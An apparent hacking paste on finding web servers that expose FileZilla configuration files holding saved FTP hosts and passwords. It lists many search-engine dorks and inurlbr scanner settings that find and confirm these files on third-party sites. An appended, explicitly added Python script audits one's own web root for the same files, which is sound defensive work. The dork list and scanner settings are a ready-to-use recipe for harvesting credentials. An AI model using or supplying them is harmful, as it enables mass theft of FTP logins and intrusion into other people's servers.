Kyfx

XML FIREZILLA DOWNLOAD DORK

Aug 24th, 2015
Quick connect
QuickConnect lets you connect to servers without adding them to FileZilla's administrative panel. When a quick connection is made, the server is added to the recentservers.xml file.

Danger?
Yes: just as you can read these files, malicious applications can do the same, and when the files end up on a web server they can be read from there as well.
ex:
www.target.com.br/folder/{file.xml}
www.target.com.br/microsite/geo243/FileZilla.xml
www.target.com.br/149224/prg/programok/Total%20Commander/FileZilla/recentservers.xml

Other files:
sitemanager.xml
recentservers.xml
filezilla.xml
bookmarks.xml
filters.xml
layout.xml
queue.xml
Looking for vulnerable servers
Now let's use the inurlbr tool to search for sites with this exposure and confirm the information.
Download tool:
https://github.com/googleinurl/SCANNER-INURLBR

Setting up the command:
the tool searches through search engines.

SET DORK:
Choose your search dork:

"\FileZilla\" ext:xml
inurl:"\FileZilla\" & inurl:sitemanager.xml -github -sourceforge
inurl:"\FileZilla\" & inurl:recentservers.xml -github -sourceforge
inurl:"\FileZilla\" & inurl:filezilla.xml -github -sourceforge
inurl:"\FileZilla\" & inurl:bookmarks.xml -github -sourceforge
inurl:"\FileZilla\" & inurl:filters.xml -github -sourceforge
inurl:"\FileZilla\" & inurl:layout.xml -github -sourceforge
inurl:"\FileZilla\" & inurl:queue.xml -github -sourceforge
inurl:sitemanager.xml & ext:xml & -github -sourceforge
inurl:recentservers.xml & ext:xml & -github -sourceforge
inurl:filezilla.xml & ext:xml & -github -sourceforge
inurl:bookmarks.xml & ext:xml & -github -sourceforge
inurl:filters.xml & ext:xml & -github -sourceforge
inurl:layout.xml & ext:xml & -github -sourceforge
inurl:queue.xml & ext:xml & -github -sourceforge
inurl:"\FileZilla\" & inurl:(sitemanager.xml | recentservers.xml | filezilla.xml | filters.xml | bookmarks.xml | layout.xml | queue.xml) ext:xml -github -sourceforge
--dork 'YOUR_DORK'
- Setting: --dork '"\FileZilla\" ext:xml'

SET FILE OUTPUT:
- Setting: -s filezilla.txt

SET TYPE VALIDATION:
- Setting: -t 2
2: the second type tries to validate the error defined by -a 'VALUE_INSIDE_THE_TARGET'. It also establishes the connection with the exploit through the GET method.

SET STRING VALIDATION:
Specify the string that the search script will look for:
Example: -a {string}
Usage: -a '<title>hello world</title>'
If the specified value is found in the target, it is considered vulnerable.
- Setting: -a '<FileZilla3>'
Every FileZilla file has a root tag called <FileZilla3>. It is through this tag that we validate.
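The same <FileZilla3> root-tag check works in the other direction: an administrator can walk their own document root, find any of the seven file names listed above, confirm they really are FileZilla configs, and see whether they carry saved credentials before a search engine indexes them. This is an added example, not code from the post or from the inurlbr project; it assumes FileZilla stores each saved site as a <Server> element with <Host> and <Pass> children, and the sitemanager.xml it audits is constructed for the demo.

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# File names the post lists as FileZilla artifacts that end up inside web roots.
FILEZILLA_FILES = {"sitemanager.xml", "recentservers.xml", "filezilla.xml",
                   "bookmarks.xml", "filters.xml", "layout.xml", "queue.xml"}

def classify_filezilla_xml(path):
    """Return a finding for one file, or None if it is not a FileZilla config."""
    try:
        root = ET.parse(path).getroot()
    except ET.ParseError:
        return None
    if root.tag != "FileZilla3":  # the post's own validation: root tag <FileZilla3>
        return None
    # Assumed layout: sitemanager.xml / recentservers.xml keep sites as <Server> with Host/Pass.
    hosts = [h.text for h in root.iter("Host") if h.text]
    return {"path": str(path), "hosts": hosts,
            "saved_passwords": sum(1 for _ in root.iter("Pass"))}

def audit_webroot(webroot):
    """Walk a web root and report every FileZilla config file found under it."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if name.lower() in FILEZILLA_FILES:
                finding = classify_filezilla_xml(Path(dirpath) / name)
                if finding:
                    findings.append(finding)
    return findings

# Constructed sample, not a real capture: a minimal sitemanager.xml with one site.
SAMPLE_SITEMANAGER = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.10.0" platform="windows"><Servers><Server>
  <Host>ftp.example.invalid</Host><Port>21</Port><User>webadmin</User>
  <Pass encoding="base64">U2VjcmV0MTIz</Pass>
</Server></Servers></FileZilla3>"""

def demo():
    """Audit a throwaway web root holding the sample plus a decoy layout.xml."""
    with tempfile.TemporaryDirectory() as tmp:
        site = Path(tmp) / "microsite" / "FileZilla"
        site.mkdir(parents=True)
        (site / "sitemanager.xml").write_text(SAMPLE_SITEMANAGER)
        (Path(tmp) / "layout.xml").write_text("<layout/>")  # not FileZilla: ignored
        return audit_webroot(tmp)
```

Call demo() to see the constructed sample reported with its host and one saved password; point audit_webroot() at the document root of a server you administer to find the real thing before a dork does.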